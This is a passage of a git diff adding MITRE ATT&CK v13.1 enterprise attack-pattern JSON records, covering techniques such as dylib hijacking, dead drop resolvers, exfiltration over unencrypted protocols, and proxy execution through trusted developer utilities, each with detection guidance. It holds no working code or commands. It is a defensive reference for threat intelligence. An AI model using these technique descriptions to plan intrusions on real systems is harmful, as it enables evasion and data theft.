Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "source_name": "PegasusCitizenLab" + }, + { + "source_name": "Wired SandCat Oct 2019", + "url": "https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec", + "description": "Zetter, K. (2019, October 3). 
Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020." + } + ], + "modified": "2021-04-15T03:14:01.255Z", + "name": "Exploits", + "description": "Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. 
[Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7.json new file mode 100644 index 0000000000000000000000000000000000000000..b7fdbc05904ccb9c708b95e3fc07061636f58518 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--bf47c16e-5cbc-46d4-83f1-ed65c040d9f1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", + "type": "attack-pattern", + "created": "2020-03-14T22:24:21.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1102.001", + "url": "https://attack.mitre.org/techniques/T1102/001" + }, + { + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "source_name": "University of Birmingham C2" + } + ], + "modified": "2020-03-26T23:12:30.499Z", + "name": "Dead Drop Resolver", + "description": "Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.\n\nPopular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. 
Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.\n\nUse of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_detection": "Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure or the presence of strong encryption. Packet capture analysis will require SSL/TLS inspection if data is encrypted. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow" + ], + "x_mitre_permissions_required": [ + "User" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b.json new file mode 100644 index 0000000000000000000000000000000000000000..2acf29509e5d81e8a817488e42a732a7595af1e0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b.json 
@@ -0,0 +1,70 @@ +{ + "type": "bundle", + "id": "bundle--c7d99df9-2a46-48b5-a359-502917890cd0", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-12T23:39:25.476Z", + "name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.(Citation: copy_cmd_cisco)\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_contributors": [ + "William Cain", + "Austin Clark, @c2defense" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. 
(Citation: University of Birmingham C2) \n\nFor network infrastructure devices, collect AAA logging to monitor for `copy` commands being run to exfiltrate configuration files to non-standard destinations over unencrypted protocols such as TFTP.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Network" + ], + "x_mitre_version": "2.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Network Traffic: Network Traffic Flow", + "File: File Access", + "Command: Command Execution", + "Network Traffic: Network Connection Creation" + ], + "x_mitre_network_requirements": false, + "type": "attack-pattern", + "id": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "created": "2020-03-15T15:37:47.583Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1048/003", + "external_id": "T1048.003" + }, + { + "source_name": "copy_cmd_cisco", + "description": "Cisco. (2022, August 16). copy - Cisco IOS Configuration Fundamentals Command Reference . Retrieved July 13, 2022.", + "url": "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490.json new file mode 100644 index 0000000000000000000000000000000000000000..d708c603851abf059057caec264c901fe0699ca4 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490.json 
@@ -0,0 +1,101 @@ +{ + "type": "bundle", + "id": "bundle--64a4f54d-5040-4c19-be80-a3efda71a021", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-30T21:01:39.601Z", + "name": "Dylib Hijacking", + "description": "Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.\n\nAdversaries may gain execution by inserting malicious dylibs with the name of the missing dylib in the identified path.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Wardle Dylib Hijacking OSX 2015)(Citation: Github EmpireProject HijackScanner)(Citation: Github EmpireProject CreateHijacker Dylib) Dylibs are loaded into an application's address space allowing the malicious dylib to inherit the application's privilege level and resources. Based on the application, this could result in privilege escalation and uninhibited network access. 
This method may also evade detection from security products since the execution is masked under a legitimate process.(Citation: Writing Bad Malware for OSX)(Citation: wardle artofmalware volume1)(Citation: MalwareUnicorn macOS Dylib Injection MachO)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process. \n\nRun path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, and LC_RPATH. Other special keywords are recognized by the macOS loader are @rpath, @loader_path, and @executable_path.(Citation: Apple Developer Doco Archive Run-Path) These loader instructions can be examined for individual binaries or frameworks using the otool -l command. 
Objective-See's Dylib Hijacking Scanner can be used to identify applications vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: Github EmpireProject HijackScanner)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "2.0", + "x_mitre_data_sources": [ + "File: File Modification", + "File: File Creation", + "Module: Module Load" + ], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "type": "attack-pattern", + "id": "attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490", + "created": "2020-03-16T15:23:30.896Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1574/004", + "external_id": "T1574.004" + }, + { + "source_name": "MalwareUnicorn macOS Dylib Injection MachO", + "description": "Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. Retrieved March 29, 2021.", + "url": "https://malwareunicorn.org/workshops/macos_dylib_injection.html#5" + }, + { + "source_name": "Apple Developer Doco Archive Run-Path", + "description": "Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved March 31, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html" + }, + { + "source_name": "Wardle Dylib Hijacking OSX 2015", + "description": "Patrick Wardle. (2015, March 1). Dylib Hijacking on OS X. Retrieved March 29, 2021.", + "url": "https://www.virusbulletin.com/uploads/pdf/magazine/2015/vb201503-dylib-hijacking.pdf" + }, + { + "source_name": "Writing Bad Malware for OSX", + "description": "Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. 
Retrieved July 10, 2017.", + "url": "https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf" + }, + { + "source_name": "Wardle Dylib Hijack Vulnerable Apps", + "description": "Patrick Wardle. (2019, July 2). Getting Root with Benign AppStore Apps. Retrieved March 31, 2021.", + "url": "https://objective-see.com/blog/blog_0x46.html" + }, + { + "source_name": "wardle artofmalware volume1", + "description": "Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.", + "url": "https://taomm.org/vol1/pdfs.html" + }, + { + "source_name": "Github EmpireProject HijackScanner", + "description": "Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.", + "url": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/python/situational_awareness/host/osx/HijackScanner.py" + }, + { + "source_name": "Github EmpireProject CreateHijacker Dylib", + "description": "Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.", + "url": "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d.json new file mode 100644 index 0000000000000000000000000000000000000000..c9ad9791c30cc8b1d744b2f151afcc8d4781e7d0 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d.json 
@@ -0,0 +1,53 @@ +{ + "type": "bundle", + "id": "bundle--26eb2129-8357-4f2c-a2b2-0b46c62498bb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "attack-pattern--fc74ba38-dc98-461f-8611-b3dbf9978e3d", + "type": "attack-pattern", + "created": "2020-10-19T19:53:10.576Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1601.002", + "url": "https://attack.mitre.org/techniques/T1601/002" + }, + { + "source_name": "Cisco Synful Knock Evolution", + "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices", + "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020." + } + ], + "modified": "2020-10-22T17:49:02.660Z", + "name": "Downgrade System Image", + "description": "Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. (Citation: Cisco Synful Knock Evolution)\n\nOn embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.\n\nDowngrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://attack.mitre.org/techniques/T1600). 
Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001). ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_detection": "Many embedded network devices provide a command to print the version of the currently running operating system. Use this command to query the operating system for its version number and compare it to what is expected for the device in question. Because image downgrade may be used in conjunction with [Patch System Image](https://attack.mitre.org/techniques/T1601/001), it may be appropriate to also verify the integrity of the vendor provided operating system image file. ", + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_data_sources": [ + "File: File Modification" + ], + "x_mitre_permissions_required": [ + "Administrator" + ] + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2.json new file mode 100644 index 0000000000000000000000000000000000000000..d34a01ba1e0dd3667ecec218f86026f1027a9437 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2.json 
@@ -0,0 +1,69 @@ +{ + "type": "bundle", + "id": "bundle--41245398-f6a9-4d06-b578-85b464206edd", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-04-13T17:17:49.889Z", + "name": "Local Accounts", + "description": "Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.\n\nLocal Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Perform regular audits of local system accounts to detect accounts that may have been created by an adversary for persistence. 
Look for suspicious account behavior, such as accounts logged in at odd times or outside of business hours.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows", + "Containers" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "Logon Session: Logon Session Metadata", + "User Account: User Account Authentication", + "Logon Session: Logon Session Creation" + ], + "x_mitre_permissions_required": [ + "Administrator", + "User" + ], + "type": "attack-pattern", + "id": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", + "created": "2020-03-13T20:26:46.695Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1078/003", + "external_id": "T1078.003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b.json new file mode 100644 index 0000000000000000000000000000000000000000..dfdec377cbdf31fb255bf85099b6d4b320b8b443 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b.json 
@@ -0,0 +1,58 @@ +{ + "type": "bundle", + "id": "bundle--de584933-c7f8-4c2d-bfdf-b6dbdef33dfc", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "John Lambert, Microsoft Threat Intelligence Center" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "created": "2018-04-18T17:59:24.739Z", + "x_mitre_version": "1.3", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1211", + "url": "https://attack.mitre.org/techniques/T1211" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them.\n\nAdversaries may have prior knowledge through reconnaissance that security software exists within an environment or they may perform checks during or shortly after the system is compromised for [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will likely be targeted directly for exploitation. 
There are examples of antivirus software being targeted by persistent threat groups to avoid detection.", + "modified": "2022-04-28T16:10:16.632Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploitation for Defense Evasion", + "x_mitre_detection": "Exploitation for defense evasion may happen shortly after the system has been compromised to prevent detection during later actions for for additional tools that may be brought in and used. Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the system that might indicate successful compromise, such as abnormal behavior of processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution or evidence of Discovery.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Process: Process Creation" + ], + "x_mitre_defense_bypassed": [ + "Anti-virus", + "System access controls" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b.json new file mode 100644 index 0000000000000000000000000000000000000000..4dc060abe2e7aa0bad00482bd84791d7d8d3e36b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b.json 
@@ -0,0 +1,76 @@ +{ + "type": "bundle", + "id": "bundle--63e21c37-df8f-476d-9a10-8c0abf8b8808", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "Casey Smith", + "Matthew Demaske, Adaptforward" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", + "created": "2017-05-31T21:31:39.262Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1127", + "url": "https://attack.mitre.org/techniques/T1127" + }, + { + "source_name": "Exploit Monday WinDbg", + "url": "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html", + "description": "Graeber, M. (2016, August 15). Bypassing Application Whitelisting by using WinDbg/CDB as a Shellcode Runner. Retrieved May 26, 2017." + }, + { + "source_name": "LOLBAS Tracker", + "url": "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", + "description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019." + }, + { + "source_name": "engima0x3 RCSI Bypass", + "url": "https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/", + "description": "Nelson, M. (2016, November 21). Bypassing Application Whitelisting By Using rcsi.exe. Retrieved May 26, 2017." + }, + { + "source_name": "engima0x3 DNX Bypass", + "url": "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/", + "description": "Nelson, M. (2017, November 17). Bypassing Application Whitelisting By Using dnx.exe. Retrieved May 25, 2017." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. 
There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.", + "modified": "2022-05-05T05:00:37.443Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Trusted Developer Utilities Proxy Execution", + "x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. 
Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.", + "kill_chain_phases": [ + { + "phase_name": "defense-evasion", + "kill_chain_name": "mitre-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_data_sources": [ + "Process: Process Creation", + "Command: Command Execution" + ], + "x_mitre_defense_bypassed": [ + "Application Control" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc.json b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc.json new file mode 100644 index 0000000000000000000000000000000000000000..0f88a6973ee2573ab4da97a4075efd4f55ca12c3 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/attack-pattern/attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc.json 
@@ -0,0 +1,80 @@ +{ + "type": "bundle", + "id": "bundle--f8e3f4bf-9bc6-49fa-ae1b-ceb4cd97ed26", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-22T20:45:22.531Z", + "name": "System Shutdown/Reboot", + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) (e.g. reload).(Citation: Microsoft Shutdown Oct 2017)(Citation: alert_TA18_106A)\n\nShutting down or rebooting systems may disrupt access to computer resources for legitimate users while also impeding incident response/recovery.\n\nAdversaries may attempt to shutdown/reboot a system after impacting it in other ways, such as [Disk Structure Wipe](https://attack.mitre.org/techniques/T1561/002) or [Inhibit System Recovery](https://attack.mitre.org/techniques/T1490), to hasten the intended effects on system availability.(Citation: Talos Nyetya June 2017)(Citation: Talos Olympic Destroyer 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_contributors": [ + "Austin Clark, @c2defense", + "Hubert Mank" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Use process monitoring to monitor the execution and command line parameters of binaries involved in shutting down or rebooting systems. Windows event logs may also designate activity associated with a shutdown/reboot, ex. Event ID 1074 and 6006. Unexpected or unauthorized commands from network cli on network devices may also be associated with shutdown/reboot, e.g. 
